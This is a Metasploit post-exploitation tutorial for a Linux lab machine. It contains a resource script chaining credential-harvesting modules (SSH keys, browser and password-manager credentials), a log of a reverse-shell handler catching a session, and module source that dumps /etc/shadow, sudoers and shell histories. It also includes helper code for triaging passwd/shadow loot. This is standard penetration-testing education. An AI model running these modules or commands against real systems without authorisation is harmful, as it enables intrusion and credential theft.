Metasploit - enum_linux

As a security researcher working on a vulnerable lab machine, you usually want to gather system, application, service, process, file and network information through the Metasploit Framework once you have a session. The checklist in Basic Linux Privilege Escalation is a good guide to what is worth collecting.

To save time, the individual checks are bundled into a resource script, enum_linux.rc. Each `run` line executes one post module against the current session, so the script is meant to be loaded from inside the Meterpreter session you want to enumerate.

enum_linux.rc

run post/linux/gather/enum_configs
run post/linux/gather/enum_protections
run post/linux/gather/enum_system
run post/linux/gather/enum_xchat
run post/linux/gather/enum_network
run post/linux/gather/enum_psk
run post/linux/gather/enum_users_history
run credcollect
run post/multi/gather/dbvis_enum
run post/multi/gather/enum_vbox
run post/multi/gather/env
run post/multi/gather/filezilla_client_cred
run post/multi/gather/wlan_geolocate
run post/multi/gather/thunderbird_creds
run post/multi/gather/ssh_creds
run post/multi/gather/remmina_creds
run post/multi/gather/pidgin_cred
run post/multi/gather/pgpass_creds
run post/multi/gather/lastpass_creds
run post/multi/gather/firefox_creds
run post/multi/gather/find_vmx

Load it from inside the session you want to enumerate:

meterpreter > resource /path/to/enum_linux.rc

post/linux/gather/enum_linux

The post module post/linux/gather/enum_linux (source below) gathers the same kind of information in a single run and stores the results as loot. The session below shows the whole path: start a handler, catch the reverse shell, background the session, then run the module against it:

msf > resource /opt/enum_linux_listener.rc
[*] Processing /opt/enum_linux_listener.rc for ERB directives.
resource (/opt/enum_linux_listener.rc)> use exploit/multi/handler
resource (/opt/enum_linux_listener.rc)> set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
resource (/opt/enum_linux_listener.rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (/opt/enum_linux_listener.rc)> run

[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.0.114:4444 -> 192.168.0.107:52336) at 2016-10-14 05:29:43 -0500

^Z
Background session 1? [y/N]  y
msf exploit(handler) > use post/linux/gather/enum_linux
msf post(enum_linux) > show options

Module options (post/linux/gather/enum_linux):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

msf post(enum_linux) > set SESSION 1
SESSION => 1
msf post(enum_linux) > run

[+] Operating System:
[+]     Kali GNU/Linux Rolling
[+]     Linux sh 4.6.0-kali1-686-pae #1 SMP Debian 4.6.4-1kali1 (2016-07-21) i686 GNU/Linux
[*] Linux Information stored in /root/.msf4/loot/20161014053028_default_192.168.0.107_linux.enum.syste_101397.txt
[*] Post module execution completed

code - post/linux/gather/enum_linux.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class MetasploitModule < Msf::Post

  include Msf::Post::File
  include Msf::Post::Linux::System

  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'Linux Gather System Information',
      'Description'   => %q{
        This module gathers system information. We collect
        installed packages, installed services, mount information,
        user list, user bash history and cron jobs, files, and so on.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Nixawk'
        ],
      'Platform'      => ['linux'],
      'SessionTypes'  => ['shell', 'meterpreter']
    ))
  end

  def run
    distro = get_sysinfo
    store_loot(
      "linux.version",
      "text/plain",
      session,
      "Distro: #{distro[:distro]}, Version: #{distro[:version]}, Kernel: #{distro[:kernel]}",
      "linux_info.txt",
      "Linux Version")

    # Operating System
    print_good("Operating System:")
    print_good("\t#{distro[:version]}")
    print_good("\t#{distro[:kernel]}")

    # Application & Services
    installed_pkg = get_packages(distro[:distro])
    installed_svc = get_services(distro[:distro])

    # Raw shell commands, run through cmd_exec rather than cat_file/read_file
    commands = [
      ## system
      "/bin/hostname 2>/dev/null",
      "/bin/uname -a 2>/dev/null",
      "/bin/cat /etc/*-release 2>/dev/null",

      # Communications & Networking
      "/sbin/ifconfig -a 2>/dev/null",
      "/bin/netstat -antp 2>/dev/null",
      "/bin/netstat -anup 2>/dev/null",
      "/bin/cat /etc/resolv.conf 2>/dev/null",
      "/sbin/route -e",
      "/sbin/iptables -L",
      "/sbin/iptables -L -t nat",
      "/sbin/iptables -L -t mangle",
      "/bin/cat /etc/hosts",
      "/usr/bin/lsof -nPi",
      "/sbin/iwconfig",
      "/bin/ls -R /etc/network",
      "/sbin/route 2>/dev/null",
      "/bin/cat /etc/inetd.conf 2>/dev/null",
      "/bin/cat /etc/xinetd.conf 2>/dev/null",
      "/bin/ls -la /etc/init.d 2>/dev/null",

      # Confidential Information & Users
      "/usr/bin/id 2>/dev/null",
      "/usr/bin/lastlog | /bin/grep -v \"Never\" 2>/dev/null",
      "/bin/cat /etc/passwd 2>/dev/null",
      "/bin/cat /etc/shadow 2>/dev/null",
      "/bin/cat /etc/master.passwd 2>/dev/null",
      "/bin/cat /etc/sudoers 2>/dev/null",
      "sudo -V 2>/dev/null",
      "echo '' | sudo -S -l 2>/dev/null",

      # /* Processes */
      "ps aux 2>/dev/null",

      # /* USER/GROUP */
      "/usr/bin/whoami 2>/dev/null",

      ## FILES AND DIRECTORIES
      "/bin/ls -ahl /root/ 2>/dev/null",
      "/bin/ls -ahl /home/ 2>/dev/null",
      "/bin/ls -ahl /etc/ 2>/dev/null",
      "/bin/ls -ahl /opt/ 2>/dev/null",
      "/bin/ls -ahl /var/ 2>/dev/null",
      "/bin/ls -ahl /tmp/ 2>/dev/null",
      "/bin/ls -ahl $HOME 2>/dev/null",
      "/bin/cat /etc/ssh/sshd_config 2>/dev/null",

      # /* ENVIRONMENTAL */
      "/bin/cat /etc/issue 2>/dev/null",
      "/bin/echo $PATH 2>/dev/null",
      "/bin/cat /etc/shells 2>/dev/null",
      "umask -S 2>/dev/null; umask 2>/dev/null",
      "/bin/cat /etc/login.defs 2>/dev/null",
      "/bin/cat ~/.bash_history 2>/dev/null",
      "/bin/cat /root/.bash_history 2>/dev/null",
      "/usr/bin/env 2>/dev/null",
      "/bin/ls -la /var/log/ 2>/dev/null",

      # /* JOBS/TASKS */
      "/bin/ls -la /etc/cron* 2>/dev/null",
      "/bin/cat /etc/crontab 2>/dev/null",
      "/bin/ls -la /var/spool/cron/crontabs 2>/dev/null",
      "/bin/ls -la /etc/anacrontab 2>/dev/null; /bin/cat /etc/anacrontab 2>/dev/null",
      "/bin/ls -la /var/spool/anacron 2>/dev/null",

      # /* SOFTWARE */
      "mysql --version 2>/dev/null",
      "mysqladmin -uroot -proot version 2>/dev/null",
      "mysqladmin -uroot version 2>/dev/null",
      "psql -V 2>/dev/null",
      "redis-cli --version 2>/dev/null",
      "mongo --version 2>/dev/null",
      "apache2 -v 2>/dev/null; httpd -v 2>/dev/null",
      "/bin/cat /etc/apache2/envvars 2>/dev/null",

      # /* INTERESTING FILES */
      "/bin/mount -l",
      "/bin/df -ahT",
      "find /var/log -type f -perm -4 2> /dev/null",
      # setuid or setgid files that others may execute; "-perm +6000" is the
      # old GNU spelling and current findutils rejects it, "-perm /6000"
      # (any of the listed bits set) is the supported form
      "find / -xdev -type f -perm /6000 -perm -1 2> /dev/null"
    ]

    commands.each do |command|
      output = execute(command)
      # Skip commands that produced nothing (missing binary, no permission)
      next if output.nil? || output.strip.empty?
      save(command, "enum-linux $ #{command}\n#{output}")
    end

    save("Installed Packages", installed_pkg)
    save("Installed Services", installed_svc)

  end

  def execute(cmd)
    vprint_status("Execute: #{cmd}")
    output = cmd_exec(cmd)
    output
  end

  def save(msg, data, ctype = 'text/plain')
    ltype = "linux.enum.system"
    loot = store_loot(ltype, ctype, session, data, nil, msg)
    print_status("#{msg} stored in #{loot}")
  end

  def get_packages(distro)
    packages_installed = ""
    case distro
    when /fedora|redhat|suse|mandrake|oracle|amazon/
      packages_installed = execute("rpm -qa")
    when /slackware/
      packages_installed = execute("/bin/ls /var/log/packages")
    when /ubuntu|debian/
      packages_installed = execute("/usr/bin/dpkg -l")
    when /gentoo/
      packages_installed = execute("equery list")
    when /arch/
      packages_installed = execute("/usr/bin/pacman -Q")
    else
      print_error("Could not determine package manager to get list of installed packages")
    end
    packages_installed
  end

  def get_services(distro)
    services_installed = ""
    case distro
    when /fedora|redhat|suse|mandrake|oracle|amazon/
      services_installed = execute("/sbin/chkconfig --list")
    when /slackware/
      services_installed << "\nEnabled:\n*************************\n"
      services_installed << execute("ls -F /etc/rc.d | /bin/grep \'*$\'")
      services_installed << "\n\nDisabled:\n*************************\n"
      services_installed << execute("ls -F /etc/rc.d | /bin/grep '[a-zA-Z0-9]$'")
    when /ubuntu|debian/
      services_installed = execute("/usr/sbin/service --status-all")
    when /gentoo/
      services_installed = execute("/bin/rc-status --all")
    when /arch/
      services_installed = execute("/bin/egrep '^DAEMONS' /etc/rc.conf")
    else
      print_error("Could not determine the Linux Distribution to get list of configured services")
    end
    services_installed
  end
end
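The `case distro` dispatch in get_packages and get_services recognises a fixed list of distribution names and sends anything else to the error branch. os-release(5) is a distro-neutral source for the same decision, and its ID_LIKE field names the parent families, so a derivative can be mapped to its family's tooling without a per-distro regex. The following is an added example, not part of the module or of Metasploit, that shows the selection logic as plain Ruby over constructed os-release contents; the debian/ubuntu/fedora/suse/arch/gentoo command strings mirror the module's, while the "alpine" entry and the sample files are assumptions for illustration.

```ruby
# Added example (not part of the enum_linux module or of Metasploit):
# pick package- and service-listing commands from /etc/os-release,
# walking ID first and then the ID_LIKE parents, instead of matching a
# single distro name against a regex as get_packages/get_services do.

# Per-family commands. debian/ubuntu/fedora/suse/arch/gentoo mirror the
# module's strings; "alpine" is an assumed addition for illustration.
FAMILY_COMMANDS = {
  "debian" => { packages: "/usr/bin/dpkg -l",   services: "/usr/sbin/service --status-all" },
  "ubuntu" => { packages: "/usr/bin/dpkg -l",   services: "/usr/sbin/service --status-all" },
  "fedora" => { packages: "rpm -qa",            services: "/sbin/chkconfig --list" },
  "suse"   => { packages: "rpm -qa",            services: "/sbin/chkconfig --list" },
  "arch"   => { packages: "/usr/bin/pacman -Q", services: "/bin/egrep '^DAEMONS' /etc/rc.conf" },
  "gentoo" => { packages: "equery list",        services: "/bin/rc-status --all" },
  "alpine" => { packages: "apk info -v",        services: "rc-status --all" }
}.freeze

# Parse os-release(5): KEY=value per line; values may be wrapped in single
# or double quotes, and double-quoted values may escape " \ $ ` with a
# backslash. Blank lines and # comments are ignored.
def parse_os_release(text)
  text.each_line.with_object({}) do |line, vars|
    line = line.strip
    next if line.empty? || line.start_with?("#") || !line.include?("=")
    key, _, raw = line.partition("=")
    value =
      if raw.length >= 2 && raw.start_with?('"') && raw.end_with?('"')
        raw[1..-2].gsub(/\\(["\\$`])/, '\1')
      elsif raw.length >= 2 && raw.start_with?("'") && raw.end_with?("'")
        raw[1..-2]
      else
        raw
      end
    vars[key.strip] = value
  end
end

# Families to try, most specific first: ID, then each ID_LIKE token.
def distro_candidates(vars)
  ids = [vars["ID"]] + vars.fetch("ID_LIKE", "").split
  ids.compact.map(&:downcase).uniq
end

# Command set for the first recognised family, or nil when none match
# (the caller should then report that the package manager is unknown,
# as the module's else branch does).
def commands_for(os_release_text)
  vars = parse_os_release(os_release_text)
  distro_candidates(vars).each do |id|
    return FAMILY_COMMANDS[id] if FAMILY_COMMANDS.key?(id)
  end
  nil
end

# Constructed sample files, not captured from real hosts.
SAMPLE_OS_RELEASE = {
  "mint" => <<~'EOS',
    NAME="Linux Mint"
    VERSION="20.3 (Una)"
    ID=linuxmint
    ID_LIKE=ubuntu
    PRETTY_NAME="Linux Mint 20.3"
  EOS
  "centos" => <<~'EOS',
    NAME="CentOS Linux"
    # comment lines are legal in os-release
    ID="centos"
    ID_LIKE="rhel fedora"
    VERSION_ID="7"
  EOS
  "alpine" => <<~'EOS'
    NAME="Alpine Linux"
    ID=alpine
    PRETTY_NAME="Alpine Linux v3.18"
  EOS
}.freeze

if $PROGRAM_NAME == __FILE__
  SAMPLE_OS_RELEASE.each do |name, text|
    cmds = commands_for(text)
    puts "#{name}: #{cmds ? cmds[:packages] : 'unsupported family'}"
  end
end
```

In a post module the text would come from `read_file("/etc/os-release")` and the chosen strings would go to `cmd_exec`; the "centos" sample shows the fallback chain at work, since neither `centos` nor `rhel` is in the table and the match lands on `fedora`.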
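The module stores /etc/passwd and, when readable, /etc/shadow as raw loot; the pass a tester then makes by hand is to look for additional UID-0 accounts, accounts that can still log in, missing passwords and legacy hash formats. This added example (not part of the module or of Metasploit) performs that triage over constructed passwd and shadow contents. The account names and hash strings are made up; the hash prefixes follow the crypt(5) identifiers.

```ruby
# Added example (not part of the enum_linux module or of Metasploit):
# triage the /etc/passwd and /etc/shadow contents the module stores as
# loot. Reports extra UID-0 accounts, accounts that can log in
# interactively, accounts with no password, and legacy hash algorithms.

# Shells that deny interactive login.
NOLOGIN_SHELLS = %w[/usr/sbin/nologin /sbin/nologin /bin/false /usr/bin/false /bin/sync].freeze

# crypt(5) hash identifiers ($id$...). md5crypt and descrypt are flagged weak.
HASH_ALGORITHMS = {
  "1" => "md5crypt (weak)", "2a" => "bcrypt", "2b" => "bcrypt", "2y" => "bcrypt",
  "5" => "sha256crypt", "6" => "sha512crypt", "7" => "scrypt",
  "y" => "yescrypt", "gy" => "gost-yescrypt"
}.freeze

# Classify a shadow password field: :empty for no password at all,
# :locked for "!"/"*" prefixes, otherwise the algorithm name.
def hash_algorithm(field)
  return :empty if field.empty?
  return :locked if field.start_with?("!", "*")
  if field.start_with?("$")
    id = field.split("$")[1].to_s
    return HASH_ALGORITHMS.fetch(id, "unknown ($#{id}$)")
  end
  return "descrypt (weak)" if field.length == 13   # traditional 13-char DES
  "unknown"
end

# Returns { username => [finding, ...] } for accounts worth a second look.
def triage_accounts(passwd_text, shadow_text)
  shadow = shadow_text.each_line.with_object({}) do |line, h|
    name, hash = line.chomp.split(":", -1)
    h[name] = hash.to_s unless name.nil? || name.empty?
  end

  findings = {}
  note = ->(user, msg) { (findings[user] ||= []) << msg }

  passwd_text.each_line do |line|
    fields = line.chomp.split(":", -1)
    next unless fields.length == 7                 # skip malformed lines
    name, pw, uid, _gid, _gecos, _home, shell = fields
    next unless uid =~ /\A\d+\z/

    note.(name, "uid 0 but not root") if uid.to_i.zero? && name != "root"
    # An empty passwd field means no password is required at all.
    note.(name, "no password in passwd (empty field)") if pw.empty?

    if pw == "x" && shadow.key?(name)
      alg = hash_algorithm(shadow[name])
      if alg == :empty
        note.(name, "empty shadow password")
      elsif alg.is_a?(String) && alg.end_with?("(weak)")
        note.(name, "hash: #{alg}")
      end
    end

    note.(name, "interactive shell #{shell}") unless NOLOGIN_SHELLS.include?(shell)
  end
  findings
end

# Constructed sample files, not taken from a real host.
SAMPLE_PASSWD = <<~'EOS'
  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  sync:x:4:65534:sync:/bin:/bin/sync
  www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  backup:x:0:34:backup:/var/backups:/bin/sh
  alice:x:1000:1000:Alice:/home/alice:/bin/bash
  bob::1001:1001:Bob:/home/bob:/bin/zsh
  svc:x:1002:1002:svc:/srv/svc:/bin/false
EOS

SAMPLE_SHADOW = <<~'EOS'
  root:$6$saltsalt$hashhashhashhash:19000:0:99999:7:::
  daemon:*:19000:0:99999:7:::
  www-data:*:19000:0:99999:7:::
  backup:$1$saltsalt$md5md5md5md5:19000:0:99999:7:::
  alice:$y$j9T$saltsaltsaltsalt$yescrypthash:19000:0:99999:7:::
  bob:!:19000:0:99999:7:::
  svc::19000:0:99999:7:::
EOS

if $PROGRAM_NAME == __FILE__
  triage_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW).each do |user, notes|
    puts "#{user}: #{notes.join('; ')}"
  end
end
```

Run against the loot files the module writes, this turns two raw dumps into a short list: `backup` is a second UID-0 account with a login shell and an md5crypt hash, `bob` needs no password at all, and `svc` has an empty shadow entry but no usable shell.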